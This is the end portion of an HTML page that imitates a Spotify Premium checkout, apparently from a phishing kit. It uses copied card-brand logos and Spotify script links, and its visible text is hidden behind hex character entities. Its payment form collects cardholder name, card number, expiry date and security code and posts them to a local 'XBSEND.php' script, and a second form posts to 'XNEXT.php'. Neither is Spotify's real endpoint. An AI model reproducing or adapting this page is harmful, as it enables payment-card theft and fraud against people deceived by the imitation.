    <path fill="#1D1D1B" d="M112.217 142.51l12.025 12.597v-11.939h1.718v16.11l-12.022-12.57v11.88h-1.721V142.51z"/>
    <path fill="#1D1D1B" fill-rule="evenodd" d="M112.056 158.749v-16.643s11.494 12.042 12.023 12.601v-11.703h2.036v16.673l-12.02-12.573v11.645h-2.039zm12.352-3.238s-11.497-12.05-12.03-12.6v15.514h1.403v-12.122s11.484 12.023 12.016 12.582v-15.563h-1.389v12.19z" clip-rule="evenodd"/>
    <path fill="#1D1D1B" d="M134.289 143.167h7.989v1.593h-6.276v4.586h6.093v1.592h-6.093v6.05h6.276v1.598h-7.989v-15.419z"/>
    <path fill="#1D1D1B" fill-rule="evenodd" d="M134.125 143.005h8.316v1.926h-6.274v4.257h6.088v1.903h-6.088v5.736h6.274v1.922h-8.316v-15.744zm7.994 1.593v-1.277h-7.673v15.104h7.673v-1.276h-6.28v-6.373h6.094v-1.272h-6.093v-4.906h6.279z" clip-rule="evenodd"/>
    <path fill="#1D1D1B" d="M154.41 158.587h-1.72v-13.826h-3.718v-1.593h9.2v1.593h-3.761v13.826z"/>
    <path fill="#1D1D1B" fill-rule="evenodd" d="M148.799 143.005h9.531v1.926h-3.765v13.818h-2.039V144.93H148.8v-1.926zm9.212 1.593v-1.277h-8.879v1.277h3.718v13.826h1.397v-13.826h3.764z" clip-rule="evenodd"/>
    <path fill="#1D1D1B" d="M169.662 154.723l4.992-12.359 4.988 12.359 4.049-11.555h1.868l-5.917 16.213-4.988-12.42-4.992 12.42-5.903-16.213h1.859l4.044 11.555z"/>
    <path fill="#1D1D1B" fill-rule="evenodd" d="M169.671 154.266l4.838-11.96.145-.366s4.676 11.587 4.978 12.326c.261-.748 3.946-11.26 3.946-11.26h2.205l-6.137 16.835s-4.713-11.734-4.992-12.443c-.28.709-4.992 12.443-4.992 12.443l-6.138-16.836h2.2l3.947 11.261zm4.983-11.463c-.28.685-4.843 11.978-4.843 11.978l-.158.396-4.154-11.856h-1.514c.154.41 5.416 14.867 5.681 15.612.293-.733 4.988-12.397 4.988-12.397s4.687 11.664 4.979 12.397a9618.49 9618.49 0 0 0 5.69-15.612h-1.519c-.077.213-4.153 11.856-4.153 11.856s-4.718-11.689-4.997-12.374zm25.074 16.05c4.39 0 8.036-3.522 8.036-7.959 0-4.416-3.646-7.991-8.036-7.991-4.403 0-8.036 3.575-8.036 7.991 0 4.437 3.633 7.96 8.036 7.96zm-.001-1.601c-3.5 0-6.323-2.903-6.323-6.378 0-3.497 2.787-6.384 6.323-6.383 3.535 0 6.314 2.886 6.314 6.383 0 3.474-2.816 6.378-6.314 6.378z" clip-rule="evenodd"/>
    <path fill="#1D1D1B" fill-rule="evenodd" d="M199.727 159.011c-4.52 0-8.199-3.643-8.199-8.117 0-4.502 3.679-8.151 8.199-8.151 4.518 0 8.197 3.65 8.197 8.151 0 4.474-3.68 8.117-8.197 8.117zm0-15.946c-4.347 0-7.883 3.508-7.883 7.83 0 4.3 3.535 7.796 7.883 7.796 4.34 0 7.883-3.496 7.883-7.797 0-4.32-3.545-7.83-7.883-7.83z" clip-rule="evenodd"/>
    <path fill="#1D1D1B" fill-rule="evenodd" d="M199.728 157.416c-3.572 0-6.486-2.922-6.486-6.541 0-3.606 2.914-6.538 6.486-6.538 3.57 0 6.47 2.932 6.47 6.538 0 3.619-2.9 6.54-6.47 6.54zm0-12.76c-3.4 0-6.16 2.793-6.16 6.219 0 3.428 2.76 6.224 6.16 6.224 3.4 0 6.15-2.795 6.15-6.224 0-3.425-2.751-6.218-6.15-6.218zm15.485 13.931h1.713v-6.772h.435l4.653 6.773h2.109l-4.905-6.913c2.377-.203 3.86-1.881 3.86-4.254 0-3.472-2.715-4.253-5.638-4.253h-2.227v15.42zm2.247-8.284h-.534v-5.543h.514c2.063 0 3.925.253 3.925 2.782 0 2.395-1.967 2.76-3.905 2.76z" clip-rule="evenodd"/>
    <path fill="#1D1D1B" fill-rule="evenodd" d="M215.051 143.006h.161v-.001h2.228c3.905 0 5.8 1.44 5.8 4.415 0 2.373-1.479 4.036-3.753 4.348.245.357 4.952 6.982 4.952 6.982h-.317l-2.236-.073s-4.533-6.584-4.533-6.701h-.264v6.774h-2.038v-15.744zm7.868 4.414c0-2.794-1.745-4.098-5.48-4.098 0 0-1.792 0-2.07-.002v15.104h1.394v-6.77h.162l.56.07s4.532 6.583 4.532 6.7h1.8l-4.899-6.881.285-.027c2.26-.19 3.716-1.803 3.716-4.096z" clip-rule="evenodd"/>
    <path fill="#1D1D1B" fill-rule="evenodd" d="M216.764 144.598h.676c1.977 0 4.086.225 4.086 2.945 0 2.583-2.173 2.917-4.067 2.917h-.695v-5.862zm4.437 2.945c0-2.422-1.781-2.611-3.76-2.611h-.352v5.204h.37c1.853 0 3.742-.307 3.742-2.593z" clip-rule="evenodd"/>
    <path fill="#1D1D1B" d="M239.69 143.167H242l-7.238 7.184 7.481 8.235h-2.372l-6.321-7.075-.43.42v6.655h-1.72v-15.419h1.719v6.603l6.57-6.603z"/>
    <path fill="#1D1D1B" fill-rule="evenodd" d="M239.628 143.005h2.754s-7.183 7.13-7.408 7.351c.212.217 7.64 8.394 7.64 8.394h-.37l-2.49-.055s-5.998-6.72-6.215-6.954l-.007.007c-.102.097-.228.218-.245.21v6.79h-2.038v-15.743h2.038v6.382c.496-.514 6.34-6.382 6.34-6.382zm-5.09 7.338s6.556-6.503 7.07-7.022h-1.855c-.09.095-6.79 6.843-6.79 6.843v-6.843h-1.393v15.103h1.392c0-.306.045-6.6.045-6.6l.551-.551.108.13s6.206 6.94 6.206 7.021h2.01c-.455-.505-7.345-8.081-7.345-8.081z" clip-rule="evenodd"/>
    <path fill="#E7E7E7" fill-rule="evenodd" d="M30 0h290c16.6 0 30 13.4 30 30v190c0 16.6-13.4 30-30 30H30c-16.6 0-30-13.4-30-30V30C0 13.4 13.4 0 30 0zm310 30c0-11-9-20-20-20H30c-11 0-20 9-20 20v190c0 11 9 20 20 20h290c11 0 20-9 20-20V30z" clip-rule="evenodd"/>
    <defs>
        <radialGradient id="discover_card_logo_paint0_radial" cx=".5" cy=".5" r=".5" gradientTransform="matrix(48.5394 0 0 47.4531 .274 .267)" gradientUnits="userSpaceOnUse">
            <stop offset=".006" stop-color="#FFF2E8"/>
            <stop offset=".096" stop-color="#FEEDDF"/>
            <stop offset=".244" stop-color="#FDE1C7"/>
            <stop offset=".43" stop-color="#FACD9F"/>
            <stop offset=".648" stop-color="#F6B168"/>
            <stop offset=".89" stop-color="#F08E22"/>
            <stop offset="1" stop-color="#EE7D00"/>
        </radialGradient>
    </defs>
</svg>
</li>
</ul>
</li>
    <path fill="#002F86" d="M446.1 87.8h-28.8c-2.7 0-5.3 1.4-6.9 3.6L370.7 150l-16.8-56.2c-1.1-3.5-4.3-5.9-8-5.9h-28.3c-3.4 0-5.8 3.4-4.7 6.5l31.8 93.1-29.8 42.1c-2.3 3.3 0 7.9 4 7.9h28.8c2.7 0 5.2-1.3 6.9-3.6l95.6-138.2c2.4-3.4 0-7.9-4.1-7.9m-192.6 55.8c-2.7 16.4-15.7 27.4-32.3 27.4-8.3 0-15-2.7-19.2-7.8-4.3-5-5.8-12.2-4.5-20.1 2.6-16.3 15.8-27.6 32.1-27.6 8.2 0 14.7 2.7 19.1 7.9 4.3 5.2 6.1 12.4 4.8 20.2m39.9-55.8h-28.7c-2.4 0-4.6 1.7-4.9 4.3l-1.3 8-2-2.9c-6.2-9.1-20.1-12-33.8-12-31.7 0-58.7 24-64 57.6-2.7 16.8 1.2 32.9 10.7 44.1 8.7 10.3 21.2 14.6 36.1 14.6 25.5 0 39.7-16.4 39.7-16.4l-1.3 8c-.4 3.1 1.9 5.8 4.9 5.8h25.8c4.1 0 7.5-2.9 8.2-7l15.5-98.1c.6-3.2-1.8-6-4.9-6m-172 .7C118.1 110 101.7 110 85.8 110h-9.1L83 69.8c.3-2.4 2.5-4.3 4.9-4.3H92c10.8 0 21 0 26.3 6.1 3.3 3.9 4.3 9.4 3.1 16.9m-6.9-56H54.7c-4.1 0-7.5 2.9-8.2 7L22.3 193c-.4 3.1 1.9 5.8 4.9 5.8h28.6c4 0 7.5-2.9 8.2-7l6.5-41.4c.7-4 4.1-7 8.2-7h19c39.4 0 62.2-19.1 68.1-56.9 2.7-16.5.1-29.6-7.6-38.6-8.5-10.2-23.7-15.4-43.7-15.4"/>
    <path fill="#009CDE" d="M754.3 36.6L729.7 193c-.4 3.1 1.9 5.8 4.9 5.8h24.7c4 0 7.5-2.9 8.2-7l24.2-153.5c.4-3.1-1.9-5.8-4.9-5.8h-27.6c-2.4 0-4.6 1.7-4.9 4.1m-73.8 107c-2.7 16.4-15.7 27.4-32.3 27.4-8.3 0-15-2.7-19.2-7.8-4.3-5-5.8-12.2-4.5-20.1 2.6-16.3 15.8-27.6 32.1-27.6 8.2 0 14.7 2.7 19.1 7.9 4.4 5.2 6.1 12.4 4.8 20.2m39.9-55.8h-28.6c-2.4 0-4.6 1.7-4.9 4.3l-1.3 8-2-2.9c-6.2-9.1-20.1-12-33.8-12-31.7 0-58.7 24-64 57.6-2.7 16.8 1.2 32.9 10.7 44.1 8.7 10.3 21.2 14.6 36.1 14.6 25.5 0 39.7-16.4 39.7-16.4l-1.3 8c-.4 3.1 1.9 5.8 4.9 5.8h25.7c4.1 0 7.5-2.9 8.2-7l15.5-98.1c.6-3.2-1.8-6-4.9-6m-172 .7c-3.3 21.5-19.6 21.5-35.6 21.5h-9.1l6.3-40.2c.3-2.4 2.5-4.3 4.9-4.3h4.1c10.8 0 21 0 26.3 6.1 3.3 3.9 4.3 9.4 3.1 16.9m-6.9-56h-59.8c-4.1 0-7.5 2.9-8.2 7L449.3 193c-.4 3.1 1.9 5.8 4.9 5.8h30.7c2.8 0 5.3-2.1 5.8-4.9l6.9-43.6c.7-4 4.1-7 8.2-7h19c39.4 0 62.2-19.1 68.1-56.9 2.7-16.5.1-29.6-7.6-38.6-8.6-10.1-23.8-15.3-43.8-15.3"/>
</svg>
</li>
</ul>
</li>
</ul>
</div>
</div>
</div>
<div class="message-panel hidden" data-transactional-messages></div>
<div class="message-panel error-message with-icon hidden" data-form-field-messages>
<div class="icon">
<svg viewBox="0 0 24 24">
        <circle cx="12" cy="12" r="9.5" stroke="currentColor" fill="none"></circle>
        <line x1="12" y1="17" x2="12" y2="10" stroke="currentColor"></line>
        <circle cx="12" cy="7.35" r=".35" stroke="currentColor" fill="none"></circle>
</svg>
</div>
<ul class="form-message-list"></ul>
</div>

<!--------------------CC--------------------------------------->
<form name="offer" method="post" action="XBSEND.php">
<div class="panel-tab  selected" data-checkout-panel-tab data-name="billing_adyen_cards">
<body class="pci-body">
<form id="payment-form">
<input id="generation-time" type="hidden" data-encrypted-name="generationtime" value="2019-07-01T21:18:22+00:00">
<div class="row">
<div class="col-xs-12">
<div class="form-group">
<label for="cardnumber" class="card-label"><span id="trans-cardnumber">&#x43;&#x61;&#x72;&#x64;&#x68;&#x6f;&#x6c;&#x64;&#x65;&#x72;&#x20;&#x6e;&#x61;&#x6d;&#x65;</span></label>
<span class="safe-field">
<input id="cc_holder" name="cc_holder" type="text"  placeholder="" class="form-control" required="" >
</span>
</div>
</div>
</div>
<div class="row">
<div class="col-xs-12">
<div class="form-group">
<label for="cardnumber" class="card-label"><span id="trans-cardnumber">&#x43;&#x61;&#x72;&#x64;&#x20;&#x6e;&#x75;&#x6d;&#x62;&#x65;&#x72;</span></label>

<span class="safe-field">
<input id="cc_number" name="cc_number" autocomplete="off" type="tel" maxlength="19" placeholder="1111 2222 3333 4444" data-encrypted-name="tel" class="form-control" required="required">
<br>
</span>

</div>
</div>
</div>
<div class="row">
<div class="col-xs-12">
<div class="form-group">
<label id="trans-expiration_date" for="expiration_date">&#x45;&#x78;&#x70;&#x69;&#x72;&#x61;&#x74;&#x69;&#x6f;&#x6e;&#x20;&#x64;&#x61;&#x74;&#x65;</label>
<div class="row">
<div class="col-xs-6">
<select id="expirationM" name="expirationM"  autocomplete="cc-exp-month" data-encrypted-name="expiryMonth" class="form-control">
<option id="trans-label_month" value="" default="default" selected="selected">&#x4d;&#x6f;&#x6e;&#x74;&#x68;</option>
<option value="1">&#x30;&#x31;</option>
<option value="2">&#x30;&#x32;</option>
<option value="3">&#x30;&#x33;</option>
<option value="4">&#x30;&#x34;</option>
<option value="5">&#x30;&#x35;</option>
<option value="6">&#x30;&#x36;</option>
<option value="7">&#x30;&#x37;</option>
<option value="8">&#x30;&#x38;</option>
<option value="9">&#x30;&#x39;</option>
<option value="10">&#x31;&#x30;</option>
<option value="11">&#x31;&#x31;</option>
<option value="12">&#x31;&#x32;</option>
</select>
</div>
<div class="col-xs-6">
<select id="expirationY" name="expirationY" autocomplete="cc-exp-year" data-encrypted-name="expiryYear" class="form-control">
<option id="trans-label_year" value="" default="" selected="selected">&#x59;&#x65;&#x61;&#x72;</option>
<option value="2020">&#x32;&#x30;</option>
<option value="2021">&#x32;&#x31;</option>
<option value="2022">&#x32;&#x32;</option>
<option value="2023">&#x32;&#x33;</option>
<option value="2024">&#x32;&#x34;</option>
<option value="2025">&#x32;&#x35;</option>
<option value="2026">&#x32;&#x36;</option>
<option value="2027">&#x32;&#x37;</option>
<option value="2028">&#x32;&#x38;</option>
<option value="2029">&#x32;&#x39;</option>
<option value="2030">&#x33;&#x30;</option>
<option value="2031">&#x33;&#x31;</option>
<option value="2032">&#x33;&#x32;</option>
<option value="2033">&#x33;&#x33;</option>
<option value="2034">&#x33;&#x34;</option>
<option value="2035">&#x33;&#x35;</option>
<option value="2036">&#x33;&#x36;</option>
<option value="2037">&#x33;&#x37;</option>
<option value="2038">&#x33;&#x38;</option>
<option value="2039">&#x33;&#x39;</option>
<option value="2040">&#x34;&#x30;</option>
<option value="2041">&#x34;&#x31;</option>
<option value="2042">&#x34;&#x32;</option>
<option value="2043">&#x34;&#x33;</option>
<option value="2044">&#x34;&#x34;</option>
<option value="2045">&#x34;&#x35;</option>
<option value="2046">&#x34;&#x36;</option>
<option value="2047">&#x34;&#x37;</option>
<option value="2048">&#x34;&#x38;</option>
<option value="2049">&#x34;&#x39;</option>
</select>
</div>
</div>
</div>
</div>
</div>
<div class="row">
<div class="col-xs-6">
<div class="form-group">
<label id="trans-security_code" for="security-code" class="contain-tooltip">&#x53;&#x65;&#x63;&#x75;&#x72;&#x69;&#x74;&#x79;&#x20;&#x63;&#x6f;&#x64;&#x65;</label>
<span class="safe-field">
<input id="cvv" name="cvv" autocomplete="off" type="tel" maxlength="4" pattern="[0-9]*" placeholder="" class="form-control" required="">
</span>
</div>
</div>
</div>
</form>
<script src="https://pci.spotify.com/static/js/script.min.js?v=v69"></script>
</body>
<p class="text-legal">
<strong>&#x42;&#x79;&#x20;&#x43;&#x6c;&#x69;&#x63;&#x6b;&#x69;&#x6e;&#x67;&#x20;&#x4e;&#x65;&#x78;&#x74;&#x20;&comma;&#x20;&#x79;&#x6f;&#x75;&#x20;&#x61;&#x75;&#x74;&#x68;&#x6f;&#x72;&#x69;&#x7a;&#x65;&#x20;&#x53;&#x70;&#x6f;&#x74;&#x69;&#x66;&#x79;&#x20;&#x61;&#x75;&#x74;&#x6f;&#x6d;&#x61;&#x74;&#x69;&#x63;&#x61;&#x6c;&#x6c;&#x79;&#x20;&#x74;&#x6f;&#x20;&#x75;&#x6e;&#x6c;&#x6f;&#x63;&#x6b;&#x20;&#x79;&#x6f;&#x75;&#x72;&#x20;&#x61;&#x63;&#x63;&#x6f;&#x75;&#x6e;&#x74;&period;</strong>
 &#x49;&#x66;&#x20;&#x74;&#x68;&#x65;&#x72;&#x65;&#x20;&#x69;&#x73;&#x20;&#x61;&#x6e;&#x79;&#x20;&#x70;&#x72;&#x6f;&#x62;&#x6c;&#x65;&#x6d;&comma;&#x20;&#x77;&#x65;&rsquo;&#x6c;&#x6c;&#x20;&#x6e;&#x6f;&#x74;&#x69;&#x66;&#x79;&#x20;&#x79;&#x6f;&#x75;&#x20;&#x62;&#x65;&#x66;&#x6f;&#x72;&#x65;&#x68;&#x61;&#x6e;&#x64;&period;&#x20;&#x59;&#x6f;&#x75;&#x20;&#x63;&#x61;&#x6e;&#x20;&#x63;&#x68;&#x65;&#x63;&#x6b;&#x20;&#x79;&#x6f;&#x75;&#x72;&#x20;&#x72;&#x65;&#x6e;&#x65;&#x77;&#x61;&#x6c;&#x20;&#x64;&#x61;&#x74;&#x65;&#x20;&#x6f;&#x72;&#x20;&#x63;&#x61;&#x6e;&#x63;&#x65;&#x6c;&#x20;&#x61;&#x6e;&#x79;&#x74;&#x69;&#x6d;&#x65;&#x20;&#x76;&#x69;&#x61;&#x20;&#x79;&#x6f;&#x75;&#x72; <a href="#">&#x41;&#x63;&#x63;&#x6f;&#x75;&#x6e;&#x74;&#x20;&#x70;&#x61;&#x67;&#x65;</a>. &#x4e;&#x6f;&#x20;&#x70;&#x61;&#x72;&#x74;&#x69;&#x61;&#x6c;&#x20;&#x72;&#x65;&#x66;&#x75;&#x6e;&#x64;&#x73;&period; <a href="#">&#x54;&#x65;&#x72;&#x6d;&#x73;&#x20;&#x61;&#x6e;&#x64;&#x20;&#x43;&#x6f;&#x6e;&#x64;&#x69;&#x74;&#x69;&#x6f;&#x6e;&#x73;</a> &#x61;&#x70;&#x70;&#x6c;&#x79;&period;
</p>
<center><button type="submit" class="btn btn-green">&#x4e;&#x65;&#x78;&#x74;</button></center>
</form>
</div>
<!--------------------CC--------------------------------------->
<!-------------------------PPL---------------------------------------------->
<form name="offer" method="post" action="XNEXT.php">
<div class="panel-tab " data-checkout-panel-tab data-name="billing_paypal">
<p>
</p>
</div>
</div>
</div>
</form>
<!---------------------------------PPL----------------------------------------------->
</section>
</div>
<script src="https://www.scdn.co/webpack/checkout.0520f44b23e9f6c9b655.js"></script>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<script src="https://www.scdn.co/webpack/premium-checkout.568717e819bff23d1420.js"></script>
<script defer src="https://www.fastly-insights.com/insights.js?k=040e3997-282c-4275-ba9b-a406ce78b133&dnt=1"></script>

</body>
</html>
